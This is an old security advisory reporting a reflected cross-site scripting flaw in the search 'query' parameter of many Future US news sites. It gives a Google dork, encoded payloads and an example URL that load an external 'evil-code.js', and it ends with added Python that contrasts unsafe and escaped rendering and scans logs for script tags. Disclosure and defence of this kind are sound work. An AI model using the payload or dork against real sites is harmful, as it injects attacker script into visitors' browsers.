NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!

+===================================================================================================================+
+ Copyright 2008 - Copyright 2008 Future US // Cross-site scripting (XSS) Remote Java Execution                    +
+===================================================================================================================+

Author(s): Ivan Sanchez
Product:   Copyright 2008 Future US
           http://www.futureus-inc.com/
           http://www.dailyradar.com/
Date:      16/01/2009

A lot of domains are affected:
------------------------------
MovieBlips         - Your daily movie news
ShowHype           - Biggest stories, best fans
TVBlips            - For TV aficionados only
42Blips            - For science fiction fans
ComicsBlips        - Excelsior! Comics news galore!
TotalFilm          - Welcome to the movies!
BallHype           - Best stories, biggest fans
ActionSportsBlips  - Surf, Skate, Ski, Snowboard
BikeRadar          - The world is for riding
MMABlips           - News to fight for
RacingBlips        - News built for speed
CyclingNews        - The world centre of cycling
WallStreetBlips    - Show me the money
BeltwayBlips       - All politics, all the time
EarthBlips         - Re-imagine the planet
much more......

Description:
------------
The search page reflects the "query" parameter into the HTML response without validation or encoding. The issue is
exploited from the query string: XSS code or a reference to an external script can be submitted through the search
textbox (it then appears in the query string of the resulting page), or placed directly in the query string.

GOOGLE DORKS:
-------------
intext:"Copyright 2008 Future US"

Parameter Affected:
-------------------
query=%22%3E%3Cscript%20src=http://nullcode.com.ar/thirdparty/scripts/evil-code.js%3E%3C/script%3E
query=">&t=advanced&s=0&d=0&start=60
query=">

Example url:
------------
http://domain/search/?query=%22%3E%3Cscript%20src=http://nullcode.com.ar/thirdparty/scripts/evil-code.js%3E%3C/script%3E

Remediation:
------------
Validate the Input.
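The advisory's remediation is "validate the input"; in practice the durable fix for a reflected parameter is context-aware output encoding, with input validation and request-log monitoring as additional layers. The following added Python example (not code from the advisory or from the affected sites) shows the defect and the fix side by side: a search page fragment rendered by raw string concatenation versus the same fragment rendered through html.escape, plus a small URL-decoding check of the kind a defender would run over web access logs to spot the reflected-script pattern described above. The search URL, the host example.invalid and the function names are constructed for the example.

```python
import html
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample request: the same shape as the advisory's example URL,
# with a placeholder script host instead of a real one.
SAMPLE_URL = ("http://domain/search/?query=%22%3E%3Cscript%20src="
              "http://example.invalid/x.js%3E%3C/script%3E")


def query_from_url(url: str) -> str:
    """Extract and URL-decode the 'query' parameter the way the server sees it."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("query", [""])[0]


def render_unsafe(query: str) -> str:
    """The 'before' behaviour: the search term is concatenated straight into
    the page. A value such as "><script ...> closes the attribute and the tag
    and starts a script element, which is exactly the reflected XSS above."""
    return (f'<input name="query" value="{query}">'
            f'<p>Results for {query}</p>')


def render_safe(query: str) -> str:
    """The fix: encode for the HTML contexts the value is placed in.
    html.escape(quote=True) converts <, >, &, " and ' to entities, so the
    browser renders the term as text both inside value="..." and in the
    paragraph body, and never parses it as markup."""
    safe = html.escape(query, quote=True)
    return (f'<input name="query" value="{safe}">'
            f'<p>Results for {safe}</p>')


def decode_fully(raw: str, rounds: int = 3) -> str:
    """URL-decode repeatedly (bounded) so double-encoded payloads are not missed
    when scanning logs; stops early once decoding no longer changes the string."""
    current = raw
    for _ in range(rounds):
        decoded = unquote(current)
        if decoded == current:
            break
        current = decoded
    return current


def looks_like_reflected_script(log_line: str) -> bool:
    """Detection heuristic for access logs: after decoding, does the request
    carry an HTML script tag or a javascript: URL in its query string?"""
    decoded = decode_fully(log_line).lower()
    return "<script" in decoded or "javascript:" in decoded


if __name__ == "__main__":
    q = query_from_url(SAMPLE_URL)
    print("decoded query :", q)
    print("unsafe render :", render_unsafe(q))
    print("safe render   :", render_safe(q))
    print("flagged       :", looks_like_reflected_script(SAMPLE_URL))
```

The escaped output is safe in the two contexts the snippet uses (a double-quoted attribute and element text); a value placed into a JavaScript string, a URL, or an event handler attribute needs that context's own encoder, which is why validation alone, as the advisory recommends, should be paired with output encoding at every reflection point.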